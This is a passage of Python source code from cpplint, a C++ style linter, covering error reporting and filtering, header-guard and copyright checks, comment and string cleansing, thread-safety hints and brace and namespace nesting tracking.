def IncrementErrorCount(self, category):
"""Bumps the module's error statistic."""
self.error_count += 1
if self.counting in ('toplevel', 'detailed'):
if self.counting != 'detailed':
category = category.split('/')[0]
if category not in self.errors_by_category:
self.errors_by_category[category] = 0
self.errors_by_category[category] += 1
def PrintErrorCounts(self):
"""Print a summary of errors by category, and the total."""
for category, count in self.errors_by_category.iteritems():
sys.stderr.write('Category \'%s\' errors found: %d\n' %
(category, count))
sys.stderr.write('Total errors found: %d\n' % self.error_count)
_cpplint_state = _CppLintState()
def _OutputFormat():
"""Gets the module's output format."""
return _cpplint_state.output_format
def _SetOutputFormat(output_format):
"""Sets the module's output format."""
_cpplint_state.SetOutputFormat(output_format)
def _VerboseLevel():
"""Returns the module's verbosity setting."""
return _cpplint_state.verbose_level
def _SetVerboseLevel(level):
"""Sets the module's verbosity, and returns the previous setting."""
return _cpplint_state.SetVerboseLevel(level)
def _SetCountingStyle(level):
"""Sets the module's counting options."""
_cpplint_state.SetCountingStyle(level)
def _Filters():
"""Returns the module's list of output filters, as a list."""
return _cpplint_state.filters
def _SetFilters(filters):
"""Sets the module's error-message filters.
These filters are applied when deciding whether to emit a given
error message.
Args:
filters: A string of comma-separated filters (eg "whitespace/indent").
Each filter should start with + or -; else we die.
"""
_cpplint_state.SetFilters(filters)
class _FunctionState(object):
"""Tracks current function name and the number of lines in its body."""
_NORMAL_TRIGGER = 250 # for --v=0, 500 for --v=1, etc.
_TEST_TRIGGER = 400 # about 50% more than _NORMAL_TRIGGER.
def __init__(self):
self.in_a_function = False
self.lines_in_function = 0
self.current_function = ''
def Begin(self, function_name):
"""Start analyzing function body.
Args:
function_name: The name of the function being tracked.
"""
self.in_a_function = True
self.lines_in_function = 0
self.current_function = function_name
def Count(self):
"""Count line in current function body."""
if self.in_a_function:
self.lines_in_function += 1
def Check(self, error, filename, linenum):
"""Report if too many lines in function body.
Args:
error: The function to call with any errors found.
filename: The name of the current file.
linenum: The number of the line to check.
"""
if Match(r'T(EST|est)', self.current_function):
base_trigger = self._TEST_TRIGGER
else:
base_trigger = self._NORMAL_TRIGGER
trigger = base_trigger * 2**_VerboseLevel()
if self.lines_in_function > trigger:
error_level = int(math.log(self.lines_in_function / base_trigger, 2))
# 50 => 0, 100 => 1, 200 => 2, 400 => 3, 800 => 4, 1600 => 5, ...
if error_level > 5:
error_level = 5
error(filename, linenum, 'readability/fn_size', error_level,
'Small and focused functions are preferred:'
' %s has %d non-comment lines'
' (error triggered by exceeding %d lines).' % (
self.current_function, self.lines_in_function, trigger))
def End(self):
"""Stop analyzing function body."""
self.in_a_function = False
class _IncludeError(Exception):
"""Indicates a problem with the include order in a file."""
pass
class FileInfo:
"""Provides utility functions for filenames.
FileInfo provides easy access to the components of a file's path
relative to the project root.
"""
def __init__(self, filename):
self._filename = filename
def FullName(self):
"""Make Windows paths like Unix."""
return os.path.abspath(self._filename).replace('\\', '/')
def RepositoryName(self):
"""FullName after removing the local path to the repository.
If we have a real absolute path name here we can try to do something smart:
detecting the root of the checkout and truncating /path/to/checkout from
the name so that we get header guards that don't include things like
"C:\Documents and Settings\..." or "/home/username/..." in them and thus
people on different computers who have checked the source out to different
locations won't see bogus errors.
"""
fullname = self.FullName()
if os.path.exists(fullname):
project_dir = os.path.dirname(fullname)
if os.path.exists(os.path.join(project_dir, ".svn")):
# If there's a .svn file in the current directory, we recursively look
# up the directory tree for the top of the SVN checkout
root_dir = project_dir
one_up_dir = os.path.dirname(root_dir)
while os.path.exists(os.path.join(one_up_dir, ".svn")):
root_dir = os.path.dirname(root_dir)
one_up_dir = os.path.dirname(one_up_dir)
prefix = os.path.commonprefix([root_dir, project_dir])
return fullname[len(prefix) + 1:]
# Not SVN <= 1.6? Try to find a git, hg, or svn top level directory by
# searching up from the current path.
root_dir = os.path.dirname(fullname)
while (root_dir != os.path.dirname(root_dir) and
not os.path.exists(os.path.join(root_dir, ".git")) and
not os.path.exists(os.path.join(root_dir, ".hg")) and
not os.path.exists(os.path.join(root_dir, ".svn"))):
root_dir = os.path.dirname(root_dir)
if (os.path.exists(os.path.join(root_dir, ".git")) or
os.path.exists(os.path.join(root_dir, ".hg")) or
os.path.exists(os.path.join(root_dir, ".svn"))):
prefix = os.path.commonprefix([root_dir, project_dir])
return fullname[len(prefix) + 1:]
# Don't know what to do; header guard warnings may be wrong...
return fullname
def Split(self):
"""Splits the file into the directory, basename, and extension.
For 'chrome/browser/browser.cc', Split() would
return ('chrome/browser', 'browser', '.cc')
Returns:
A tuple of (directory, basename, extension).
"""
googlename = self.RepositoryName()
project, rest = os.path.split(googlename)
return (project,) + os.path.splitext(rest)
def BaseName(self):
"""File base name - text after the final slash, before the final period."""
return self.Split()[1]
def Extension(self):
"""File extension - text following the final period."""
return self.Split()[2]
def NoExtension(self):
"""File has no source file extension."""
return '/'.join(self.Split()[0:2])
def IsSource(self):
"""File has a source file extension."""
return self.Extension()[1:] in ('c', 'cc', 'cpp', 'cxx')
def _ShouldPrintError(category, confidence, linenum):
"""If confidence >= verbose, category passes filter and is not suppressed."""
# There are three ways we might decide not to print an error message:
# a "NOLINT(category)" comment appears in the source,
# the verbosity level isn't high enough, or the filters filter it out.
if IsErrorSuppressedByNolint(category, linenum):
return False
if confidence < _cpplint_state.verbose_level:
return False
is_filtered = False
for one_filter in _Filters():
if one_filter.startswith('-'):
if category.startswith(one_filter[1:]):
is_filtered = True
elif one_filter.startswith('+'):
if category.startswith(one_filter[1:]):
is_filtered = False
else:
assert False # should have been checked for in SetFilter.
if is_filtered:
return False
return True
def Error(filename, linenum, category, confidence, message):
"""Logs the fact we've found a lint error.
We log where the error was found, and also our confidence in the error,
that is, how certain we are this is a legitimate style regression, and
not a misidentification or a use that's sometimes justified.
False positives can be suppressed by the use of
"cpplint(category)" comments on the offending line. These are
parsed into _error_suppressions.
Args:
filename: The name of the file containing the error.
linenum: The number of the line containing the error.
category: A string used to describe the "category" this bug
falls under: "whitespace", say, or "runtime". Categories
may have a hierarchy separated by slashes: "whitespace/indent".
confidence: A number from 1-5 representing a confidence score for
the error, with 5 meaning that we are certain of the problem,
and 1 meaning that it could be a legitimate construct.
message: The error message.
"""
if _ShouldPrintError(category, confidence, linenum):
_cpplint_state.IncrementErrorCount(category)
if _cpplint_state.output_format == 'vs7':
sys.stderr.write('%s(%s): %s [%s] [%d]\n' % (
filename, linenum, message, category, confidence))
elif _cpplint_state.output_format == 'eclipse':
sys.stderr.write('%s:%s: warning: %s [%s] [%d]\n' % (
filename, linenum, message, category, confidence))
else:
sys.stderr.write('%s:%s: %s [%s] [%d]\n' % (
filename, linenum, message, category, confidence))
# Matches standard C++ escape esequences per 2.13.2.3 of the C++ standard.
_RE_PATTERN_CLEANSE_LINE_ESCAPES = re.compile(
r'\\([abfnrtv?"\\\']|\d+|x[0-9a-fA-F]+)')
# Matches strings. Escape codes should already be removed by ESCAPES.
_RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES = re.compile(r'"[^"]*"')
# Matches characters. Escape codes should already be removed by ESCAPES.
_RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES = re.compile(r"'.'")
# Matches multi-line C++ comments.
# This RE is a little bit more complicated than one might expect, because we
# have to take care of space removals tools so we can handle comments inside
# statements better.
# The current rule is: We only clear spaces from both sides when we're at the
# end of the line. Otherwise, we try to remove spaces from the right side,
# if this doesn't work we try on left side but only if there's a non-character
# on the right.
_RE_PATTERN_CLEANSE_LINE_C_COMMENTS = re.compile(
r"""(\s*/\*.*\*/\s*$|
/\*.*\*/\s+|
\s+/\*.*\*/(?=\W)|
/\*.*\*/)""", re.VERBOSE)
def IsCppString(line):
"""Does line terminate so, that the next symbol is in string constant.
This function does not consider single-line nor multi-line comments.
Args:
line: is a partial line of code starting from the 0..n.
Returns:
True, if next character appended to 'line' is inside a
string constant.
"""
line = line.replace(r'\\', 'XX') # after this, \\" does not match to \"
return ((line.count('"') - line.count(r'\"') - line.count("'\"'")) & 1) == 1
def FindNextMultiLineCommentStart(lines, lineix):
"""Find the beginning marker for a multiline comment."""
while lineix < len(lines):
if lines[lineix].strip().startswith('/*'):
# Only return this marker if the comment goes beyond this line
if lines[lineix].strip().find('*/', 2) < 0:
return lineix
lineix += 1
return len(lines)
def FindNextMultiLineCommentEnd(lines, lineix):
"""We are inside a comment, find the end marker."""
while lineix < len(lines):
if lines[lineix].strip().endswith('*/'):
return lineix
lineix += 1
return len(lines)
def RemoveMultiLineCommentsFromRange(lines, begin, end):
"""Clears a range of lines for multi-line comments."""
# Having // dummy comments makes the lines non-empty, so we will not get
# unnecessary blank line warnings later in the code.
for i in range(begin, end):
lines[i] = '// dummy'
def RemoveMultiLineComments(filename, lines, error):
"""Removes multiline (c-style) comments from lines."""
lineix = 0
while lineix < len(lines):
lineix_begin = FindNextMultiLineCommentStart(lines, lineix)
if lineix_begin >= len(lines):
return
lineix_end = FindNextMultiLineCommentEnd(lines, lineix_begin)
if lineix_end >= len(lines):
error(filename, lineix_begin + 1, 'readability/multiline_comment', 5,
'Could not find end of multi-line comment')
return
RemoveMultiLineCommentsFromRange(lines, lineix_begin, lineix_end + 1)
lineix = lineix_end + 1
def CleanseComments(line):
"""Removes //-comments and single-line C-style /* */ comments.
Args:
line: A line of C++ source.
Returns:
The line with single-line comments removed.
"""
commentpos = line.find('//')
if commentpos != -1 and not IsCppString(line[:commentpos]):
line = line[:commentpos].rstrip()
# get rid of /* ... */
return _RE_PATTERN_CLEANSE_LINE_C_COMMENTS.sub('', line)
class CleansedLines(object):
"""Holds 3 copies of all lines with different preprocessing applied to them.
1) elided member contains lines without strings and comments,
2) lines member contains lines without comments, and
3) raw_lines member contains all the lines without processing.
All these three members are of <type 'list'>, and of the same length.
"""
def __init__(self, lines):
self.elided = []
self.lines = []
self.raw_lines = lines
self.num_lines = len(lines)
for linenum in range(len(lines)):
self.lines.append(CleanseComments(lines[linenum]))
elided = self._CollapseStrings(lines[linenum])
self.elided.append(CleanseComments(elided))
def NumLines(self):
"""Returns the number of lines represented."""
return self.num_lines
@staticmethod
def _CollapseStrings(elided):
"""Collapses strings and chars on a line to simple "" or '' blocks.
We nix strings first so we're not fooled by text like '"http://"'
Args:
elided: The line being processed.
Returns:
The line with collapsed strings.
"""
if not _RE_PATTERN_INCLUDE.match(elided):
# Remove escaped characters first to make quote/single quote collapsing
# basic. Things that look like escaped characters shouldn't occur
# outside of strings and chars.
elided = _RE_PATTERN_CLEANSE_LINE_ESCAPES.sub('', elided)
elided = _RE_PATTERN_CLEANSE_LINE_SINGLE_QUOTES.sub("''", elided)
elided = _RE_PATTERN_CLEANSE_LINE_DOUBLE_QUOTES.sub('""', elided)
return elided
def FindEndOfExpressionInLine(line, startpos, depth, startchar, endchar):
"""Find the position just after the matching endchar.
Args:
line: a CleansedLines line.
startpos: start searching at this position.
depth: nesting level at startpos.
startchar: expression opening character.
endchar: expression closing character.
Returns:
Index just after endchar.
"""
for i in xrange(startpos, len(line)):
if line[i] == startchar:
depth += 1
elif line[i] == endchar:
depth -= 1
if depth == 0:
return i + 1
return -1
def CloseExpression(clean_lines, linenum, pos):
"""If input points to ( or { or [, finds the position that closes it.
If lines[linenum][pos] points to a '(' or '{' or '[', finds the
linenum/pos that correspond to the closing of the expression.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
pos: A position on the line.
Returns:
A tuple (line, linenum, pos) pointer *past* the closing brace, or
(line, len(lines), -1) if we never find a close. Note we ignore
strings and comments when matching; and the line we return is the
'cleansed' line at linenum.
"""
line = clean_lines.elided[linenum]
startchar = line[pos]
if startchar not in '({[':
return (line, clean_lines.NumLines(), -1)
if startchar == '(': endchar = ')'
if startchar == '[': endchar = ']'
if startchar == '{': endchar = '}'
# Check first line
end_pos = FindEndOfExpressionInLine(line, pos, 0, startchar, endchar)
if end_pos > -1:
return (line, linenum, end_pos)
tail = line[pos:]
num_open = tail.count(startchar) - tail.count(endchar)
while linenum < clean_lines.NumLines() - 1:
linenum += 1
line = clean_lines.elided[linenum]
delta = line.count(startchar) - line.count(endchar)
if num_open + delta <= 0:
return (line, linenum,
FindEndOfExpressionInLine(line, 0, num_open, startchar, endchar))
num_open += delta
# Did not find endchar before end of file, give up
return (line, clean_lines.NumLines(), -1)
def CheckForCopyright(filename, lines, error):
"""Logs an error if no Copyright message appears at the top of the file."""
# We'll say it should occur by line 10. Don't forget there's a
# dummy line at the front.
for line in xrange(1, min(len(lines), 11)):
if re.search(r'Copyright', lines[line], re.I): break
else: # means no copyright line was found
error(filename, 0, 'legal/copyright', 5,
'No copyright message found. '
'You should have a line: "Copyright [year] <Copyright Owner>"')
def GetHeaderGuardCPPVariable(filename):
"""Returns the CPP variable that should be used as a header guard.
Args:
filename: The name of a C++ header file.
Returns:
The CPP variable that should be used as a header guard in the
named file.
"""
# Restores original filename in case that cpplint is invoked from Emacs's
# flymake.
filename = re.sub(r'_flymake\.h$', '.h', filename)
filename = re.sub(r'/\.flymake/([^/]*)$', r'/\1', filename)
fileinfo = FileInfo(filename)
file_path_from_root = fileinfo.RepositoryName()
if _root:
file_path_from_root = re.sub('^' + _root + os.sep, '', file_path_from_root)
return re.sub(r'[-./\s]', '_', file_path_from_root).upper() + '_'
def CheckForHeaderGuard(filename, lines, error):
"""Checks that the file contains a header guard.
Logs an error if no #ifndef header guard is present. For other
headers, checks that the full pathname is used.
Args:
filename: The name of the C++ header file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
cppvar = GetHeaderGuardCPPVariable(filename)
ifndef = None
ifndef_linenum = 0
define = None
endif = None
endif_linenum = 0
for linenum, line in enumerate(lines):
linesplit = line.split()
if len(linesplit) >= 2:
# find the first occurrence of #ifndef and #define, save arg
if not ifndef and linesplit[0] == '#ifndef':
# set ifndef to the header guard presented on the #ifndef line.
ifndef = linesplit[1]
ifndef_linenum = linenum
if not define and linesplit[0] == '#define':
define = linesplit[1]
# find the last occurrence of #endif, save entire line
if line.startswith('#endif'):
endif = line
endif_linenum = linenum
if not ifndef:
error(filename, 0, 'build/header_guard', 5,
'No #ifndef header guard found, suggested CPP variable is: %s' %
cppvar)
return
if not define:
error(filename, 0, 'build/header_guard', 5,
'No #define header guard found, suggested CPP variable is: %s' %
cppvar)
return
# The guard should be PATH_FILE_H_, but we also allow PATH_FILE_H__
# for backward compatibility.
if ifndef != cppvar:
error_level = 0
if ifndef != cppvar + '_':
error_level = 5
ParseNolintSuppressions(filename, lines[ifndef_linenum], ifndef_linenum,
error)
error(filename, ifndef_linenum, 'build/header_guard', error_level,
'#ifndef header guard has wrong style, please use: %s' % cppvar)
if define != ifndef:
error(filename, 0, 'build/header_guard', 5,
'#ifndef and #define don\'t match, suggested CPP variable is: %s' %
cppvar)
return
if endif != ('#endif // %s' % cppvar):
error_level = 0
if endif != ('#endif // %s' % (cppvar + '_')):
error_level = 5
ParseNolintSuppressions(filename, lines[endif_linenum], endif_linenum,
error)
error(filename, endif_linenum, 'build/header_guard', error_level,
'#endif line should be "#endif // %s"' % cppvar)
def CheckForUnicodeReplacementCharacters(filename, lines, error):
"""Logs an error for each line containing Unicode replacement characters.
These indicate that either the file contained invalid UTF-8 (likely)
or Unicode replacement characters (which it shouldn't). Note that
it's possible for this to throw off line numbering if the invalid
UTF-8 occurred adjacent to a newline.
Args:
filename: The name of the current file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
for linenum, line in enumerate(lines):
if u'\ufffd' in line:
error(filename, linenum, 'readability/utf8', 5,
'Line contains invalid UTF-8 (or Unicode replacement character).')
def CheckForNewlineAtEOF(filename, lines, error):
"""Logs an error if there is no newline char at the end of the file.
Args:
filename: The name of the current file.
lines: An array of strings, each representing a line of the file.
error: The function to call with any errors found.
"""
# The array lines() was created by adding two newlines to the
# original file (go figure), then splitting on \n.
# To verify that the file ends in \n, we just have to make sure the
# last-but-two element of lines() exists and is empty.
if len(lines) < 3 or lines[-2]:
error(filename, len(lines) - 2, 'whitespace/ending_newline', 5,
'Could not find a newline character at the end of the file.')
def CheckForMultilineCommentsAndStrings(filename, clean_lines, linenum, error):
"""Logs an error if we see /* ... */ or "..." that extend past one line.
/* ... */ comments are legit inside macros, for one line.
Otherwise, we prefer // comments, so it's ok to warn about the
other. Likewise, it's ok for strings to extend across multiple
lines, as long as a line continuation character (backslash)
terminates each line. Although not currently prohibited by the C++
style guide, it's ugly and unnecessary. We don't do well with either
in this lint program, so we warn about both.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Remove all \\ (escaped backslashes) from the line. They are OK, and the
# second (escaped) slash may trigger later \" detection erroneously.
line = line.replace('\\\\', '')
if line.count('/*') > line.count('*/'):
error(filename, linenum, 'readability/multiline_comment', 5,
'Complex multi-line /*...*/-style comment found. '
'Lint may give bogus warnings. '
'Consider replacing these with //-style comments, '
'with #if 0...#endif, '
'or with more clearly structured multi-line comments.')
if (line.count('"') - line.count('\\"')) % 2:
error(filename, linenum, 'readability/multiline_string', 5,
'Multi-line string ("...") found. This lint script doesn\'t '
'do well with such strings, and may give bogus warnings. They\'re '
'ugly and unnecessary, and you should use concatenation instead".')
threading_list = (
('asctime(', 'asctime_r('),
('ctime(', 'ctime_r('),
('getgrgid(', 'getgrgid_r('),
('getgrnam(', 'getgrnam_r('),
('getlogin(', 'getlogin_r('),
('getpwnam(', 'getpwnam_r('),
('getpwuid(', 'getpwuid_r('),
('gmtime(', 'gmtime_r('),
('localtime(', 'localtime_r('),
('rand(', 'rand_r('),
('readdir(', 'readdir_r('),
('strtok(', 'strtok_r('),
('ttyname(', 'ttyname_r('),
)
def CheckPosixThreading(filename, clean_lines, linenum, error):
"""Checks for calls to thread-unsafe functions.
Much code has been originally written without consideration of
multi-threading. Also, engineers are relying on their old experience;
they have learned posix before threading extensions were added. These
tests guide the engineers to use thread-safe functions (when using
posix directly).
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
for single_thread_function, multithread_safe_function in threading_list:
ix = line.find(single_thread_function)
# Comparisons made explicit for clarity -- pylint: disable-msg=C6403
if ix >= 0 and (ix == 0 or (not line[ix - 1].isalnum() and
line[ix - 1] not in ('_', '.', '>'))):
error(filename, linenum, 'runtime/threadsafe_fn', 2,
'Consider using ' + multithread_safe_function +
'...) instead of ' + single_thread_function +
'...) for improved thread safety.')
# Matches invalid increment: *count++, which moves pointer instead of
# incrementing a value.
_RE_PATTERN_INVALID_INCREMENT = re.compile(
r'^\s*\*\w+(\+\+|--);')
def CheckInvalidIncrement(filename, clean_lines, linenum, error):
"""Checks for invalid increment *count++.
For example following function:
void increment_counter(int* count) {
*count++;
}
is invalid, because it effectively does count++, moving pointer, and should
be replaced with ++*count, (*count)++ or *count += 1.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
if _RE_PATTERN_INVALID_INCREMENT.match(line):
error(filename, linenum, 'runtime/invalid_increment', 5,
'Changing pointer instead of value (or unused value of operator*).')
class _BlockInfo(object):
"""Stores information about a generic block of code."""
def __init__(self, seen_open_brace):
self.seen_open_brace = seen_open_brace
self.open_parentheses = 0
self.inline_asm = _NO_ASM
def CheckBegin(self, filename, clean_lines, linenum, error):
"""Run checks that applies to text up to the opening brace.
This is mostly for checking the text after the class identifier
and the "{", usually where the base class is specified. For other
blocks, there isn't much to check, so we always pass.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
pass
def CheckEnd(self, filename, clean_lines, linenum, error):
"""Run checks that applies to text after the closing brace.
This is mostly used for checking end of namespace comments.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
pass
class _ClassInfo(_BlockInfo):
"""Stores information about a class."""
def __init__(self, name, class_or_struct, clean_lines, linenum):
_BlockInfo.__init__(self, False)
self.name = name
self.starting_linenum = linenum
self.is_derived = False
if class_or_struct == 'struct':
self.access = 'public'
else:
self.access = 'private'
# Try to find the end of the class. This will be confused by things like:
# class A {
# } *x = { ...
#
# But it's still good enough for CheckSectionSpacing.
self.last_line = 0
depth = 0
for i in range(linenum, clean_lines.NumLines()):
line = clean_lines.elided[i]
depth += line.count('{') - line.count('}')
if not depth:
self.last_line = i
break
def CheckBegin(self, filename, clean_lines, linenum, error):
# Look for a bare ':'
if Search('(^|[^:]):($|[^:])', clean_lines.elided[linenum]):
self.is_derived = True
class _NamespaceInfo(_BlockInfo):
"""Stores information about a namespace."""
def __init__(self, name, linenum):
_BlockInfo.__init__(self, False)
self.name = name or ''
self.starting_linenum = linenum
def CheckEnd(self, filename, clean_lines, linenum, error):
"""Check end of namespace comments."""
line = clean_lines.raw_lines[linenum]
# Check how many lines is enclosed in this namespace. Don't issue
# warning for missing namespace comments if there aren't enough
# lines. However, do apply checks if there is already an end of
# namespace comment and it's incorrect.
#
# TODO(unknown): We always want to check end of namespace comments
# if a namespace is large, but sometimes we also want to apply the
# check if a short namespace contained nontrivial things (something
# other than forward declarations). There is currently no logic on
# deciding what these nontrivial things are, so this check is
# triggered by namespace size only, which works most of the time.
if (linenum - self.starting_linenum < 10
and not Match(r'};*\s*(//|/\*).*\bnamespace\b', line)):
return
# Look for matching comment at end of namespace.
#
# Note that we accept C style "/* */" comments for terminating
# namespaces, so that code that terminate namespaces inside
# preprocessor macros can be cpplint clean. Example: http://go/nxpiz
#
# We also accept stuff like "// end of namespace <name>." with the
# period at the end.
#
# Besides these, we don't accept anything else, otherwise we might
# get false negatives when existing comment is a substring of the
# expected namespace. Example: http://go/ldkdc, http://cl/23548205
if self.name:
# Named namespace
if not Match((r'};*\s*(//|/\*).*\bnamespace\s+' + re.escape(self.name) +
r'[\*/\.\\\s]*$'),
line):
error(filename, linenum, 'readability/namespace', 5,
'Namespace should be terminated with "// namespace %s"' %
self.name)
else:
# Anonymous namespace
if not Match(r'};*\s*(//|/\*).*\bnamespace[\*/\.\\\s]*$', line):
error(filename, linenum, 'readability/namespace', 5,
'Namespace should be terminated with "// namespace"')
class _PreprocessorInfo(object):
"""Stores checkpoints of nesting stacks when #if/#else is seen."""
def __init__(self, stack_before_if):
# The entire nesting stack before #if
self.stack_before_if = stack_before_if
# The entire nesting stack up to #else
self.stack_before_else = []
# Whether we have already seen #else or #elif
self.seen_else = False
class _NestingState(object):
"""Holds states related to parsing braces."""
def __init__(self):
# Stack for tracking all braces. An object is pushed whenever we
# see a "{", and popped when we see a "}". Only 3 types of
# objects are possible:
# - _ClassInfo: a class or struct.
# - _NamespaceInfo: a namespace.
# - _BlockInfo: some other type of block.
self.stack = []
# Stack of _PreprocessorInfo objects.
self.pp_stack = []
def SeenOpenBrace(self):
"""Check if we have seen the opening brace for the innermost block.
Returns:
True if we have seen the opening brace, False if the innermost
block is still expecting an opening brace.
"""
return (not self.stack) or self.stack[-1].seen_open_brace
def InNamespaceBody(self):
"""Check if we are currently one level inside a namespace body.
Returns:
True if top of the stack is a namespace block, False otherwise.
"""
return self.stack and isinstance(self.stack[-1], _NamespaceInfo)
def UpdatePreprocessor(self, line):
"""Update preprocessor stack.
We need to handle preprocessors due to classes like this:
#ifdef SWIG
struct ResultDetailsPageElementExtensionPoint {
#else
struct ResultDetailsPageElementExtensionPoint : public Extension {
#endif
(see http://go/qwddn for original example)
We make the following assumptions (good enough for most files):
- Preprocessor condition evaluates to true from #if up to first
#else/#elif/#endif.
- Preprocessor condition evaluates to false from #else/#elif up
to #endif. We still perform lint checks on these lines, but
these do not affect nesting stack.
Args:
line: current line to check.
"""
if Match(r'^\s*#\s*(if|ifdef|ifndef)\b', line):
# Beginning of #if block, save the nesting stack here. The saved
# stack will allow us to restore the parsing state in the #else case.
self.pp_stack.append(_PreprocessorInfo(copy.deepcopy(self.stack)))
elif Match(r'^\s*#\s*(else|elif)\b', line):
# Beginning of #else block
if self.pp_stack:
if not self.pp_stack[-1].seen_else:
# This is the first #else or #elif block. Remember the
# whole nesting stack up to this point. This is what we
# keep after the #endif.
self.pp_stack[-1].seen_else = True
self.pp_stack[-1].stack_before_else = copy.deepcopy(self.stack)
# Restore the stack to how it was before the #if
self.stack = copy.deepcopy(self.pp_stack[-1].stack_before_if)
else:
# TODO(unknown): unexpected #else, issue warning?
pass
elif Match(r'^\s*#\s*endif\b', line):
# End of #if or #else blocks.
if self.pp_stack:
# If we saw an #else, we will need to restore the nesting
# stack to its former state before the #else, otherwise we
# will just continue from where we left off.
if self.pp_stack[-1].seen_else:
# Here we can just use a shallow copy since we are the last
# reference to it.
self.stack = self.pp_stack[-1].stack_before_else
# Drop the corresponding #if
self.pp_stack.pop()
else:
# TODO(unknown): unexpected #endif, issue warning?
pass
def Update(self, filename, clean_lines, linenum, error):
"""Update nesting state with current line.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Update pp_stack first
self.UpdatePreprocessor(line)
# Count parentheses. This is to avoid adding struct arguments to
# the nesting stack.
if self.stack:
inner_block = self.stack[-1]
depth_change = line.count('(') - line.count(')')
inner_block.open_parentheses += depth_change
# Also check if we are starting or ending an inline assembly block.
if inner_block.inline_asm in (_NO_ASM, _END_ASM):
if (depth_change != 0 and
inner_block.open_parentheses == 1 and
_MATCH_ASM.match(line)):
# Enter assembly block
inner_block.inline_asm = _INSIDE_ASM
else:
# Not entering assembly block. If previous line was _END_ASM,
# we will now shift to _NO_ASM state.
inner_block.inline_asm = _NO_ASM
elif (inner_block.inline_asm == _INSIDE_ASM and
inner_block.open_parentheses == 0):
# Exit assembly block
inner_block.inline_asm = _END_ASM
# Consume namespace declaration at the beginning of the line. Do
# this in a loop so that we catch same line declarations like this:
# namespace proto2 { namespace bridge { class MessageSet; } }
while True:
# Match start of namespace. The "\b\s*" below catches namespace
# declarations even if it weren't followed by a whitespace, this
# is so that we don't confuse our namespace checker. The
# missing spaces will be flagged by CheckSpacing.
namespace_decl_match = Match(r'^\s*namespace\b\s*([:\w]+)?(.*)$', line)
if not namespace_decl_match:
break
new_namespace = _NamespaceInfo(namespace_decl_match.group(1), linenum)
self.stack.append(new_namespace)
line = namespace_decl_match.group(2)
if line.find('{') != -1:
new_namespace.seen_open_brace = True
line = line[line.find('{') + 1:]
# Look for a class declaration in whatever is left of the line
# after parsing namespaces. The regexp accounts for decorated classes
# such as in:
# class LOCKABLE API Object {
# };
#
# Templates with class arguments may confuse the parser, for example:
# template <class T
# class Comparator = less<T>,
# class Vector = vector<T> >
# class HeapQueue {
#
# Because this parser has no nesting state about templates, by the
# time it saw "class Comparator", it may think that it's a new class.
# Nested templates have a similar problem:
# template <
# typename ExportedType,
# typename TupleType,
# template <typename, typename> class ImplTemplate>
#
# To avoid these cases, we ignore classes that are followed by '=' or '>'
class_decl_match = Match(
r'\s*(template\s*<[\w\s<>,:]*>\s*)?'
'(class|struct)\s+([A-Z_]+\s+)*(\w+(?:::\w+)*)'
'(([^=>]|<[^<>]*>)*)$', line)
if (class_decl_match and
(not self.stack or self.stack[-1].open_parentheses == 0)):
self.stack.append(_ClassInfo(
class_decl_match.group(4), class_decl_match.group(2),
clean_lines, linenum))
line = class_decl_match.group(5)
# If we have not yet seen the opening brace for the innermost block,
# run checks here.
if not self.SeenOpenBrace():
self.stack[-1].CheckBegin(filename, clean_lines, linenum, error)
# Update access control if we are inside a class/struct
if self.stack and isinstance(self.stack[-1], _ClassInfo):
access_match = Match(r'\s*(public|private|protected)\s*:', line)
if access_match:
self.stack[-1].access = access_match.group(1)
# Consume braces or semicolons from what's left of the line
while True:
# Match first brace, semicolon, or closed parenthesis.
matched = Match(r'^[^{;)}]*([{;)}])(.*)$', line)
if not matched:
break
token = matched.group(1)
if token == '{':
# If namespace or class hasn't seen a opening brace yet, mark
# namespace/class head as complete. Push a new block onto the
# stack otherwise.
if not self.SeenOpenBrace():
self.stack[-1].seen_open_brace = True
else:
self.stack.append(_BlockInfo(True))
if _MATCH_ASM.match(line):
self.stack[-1].inline_asm = _BLOCK_ASM
elif token == ';' or token == ')':
# If we haven't seen an opening brace yet, but we already saw
# a semicolon, this is probably a forward declaration. Pop
# the stack for these.
#
# Similarly, if we haven't seen an opening brace yet, but we
# already saw a closing parenthesis, then these are probably
# function arguments with extra "class" or "struct" keywords.
# Also pop these stack for these.
if not self.SeenOpenBrace():
self.stack.pop()
else: # token == '}'
# Perform end of block checks and pop the stack.
if self.stack:
self.stack[-1].CheckEnd(filename, clean_lines, linenum, error)
self.stack.pop()
line = matched.group(2)
def InnermostClass(self):
"""Get class info on the top of the stack.
Returns:
A _ClassInfo object if we are inside a class, or None otherwise.
"""
for i in range(len(self.stack), 0, -1):
classinfo = self.stack[i - 1]
if isinstance(classinfo, _ClassInfo):
return classinfo
return None
def CheckClassFinished(self, filename, error):
"""Checks that all classes have been completely parsed.
Call this when all lines in a file have been processed.
Args:
filename: The name of the current file.
error: The function to call with any errors found.
"""
# Note: This test can result in false positives if #ifdef constructs
# get in the way of brace matching. See the testBuildClass test in
# cpplint_unittest.py for an example of this.
for obj in self.stack:
if isinstance(obj, _ClassInfo):
error(filename, obj.starting_linenum, 'build/class', 5,
'Failed to find complete declaration of class %s' %
obj.name)
def CheckForNonStandardConstructs(filename, clean_lines, linenum,
nesting_state, error):
"""Logs an error if we see certain non-ANSI constructs ignored by gcc-2.
Complain about several constructs which gcc-2 accepts, but which are
not standard C++. Warning about these in lint is one way to ease the
transition to new compilers.
